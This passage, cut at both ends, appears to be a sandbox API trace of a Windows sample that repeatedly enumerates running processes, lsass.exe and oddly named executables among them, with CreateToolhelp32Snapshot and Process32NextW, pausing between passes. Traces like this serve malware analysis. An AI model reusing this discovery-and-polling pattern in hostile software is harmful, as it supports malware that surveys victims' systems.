th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0107.832] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0107.832] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.833] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.833] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.834] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.835] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.835] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0107.836] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.837] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.837] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0107.839] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.840] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.841] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0107.842] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0107.843] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0107.844] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.846] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.847] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0107.848] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0107.849] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0107.851] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0107.899] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0107.900] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0107.901] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0107.902] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0107.903] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0107.904] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0107.905] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0107.906] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0107.907] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0107.909] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0107.910] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0107.911] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0107.912] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0107.913] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0107.914] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0107.915] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0107.916] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.917] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0107.918] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0107.919] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0107.920] CloseHandle (hObject=0xbc) returned 1 [0107.920] Sleep (dwMilliseconds=0x12c) [0108.272] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0108.277] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.277] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0108.278] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0108.278] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.279] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0108.280] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.280] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0108.281] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0108.282] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0108.282] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0108.283] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.284] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.284] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.285] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.286] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.286] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0108.287] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.288] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.288] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0108.290] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.291] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.292] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0108.293] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.294] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.295] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.296] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.297] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0108.299] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0108.300] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0108.301] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0108.302] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0108.303] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0108.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0108.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0108.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0108.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0108.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0108.411] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0108.412] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0108.413] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0108.415] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, 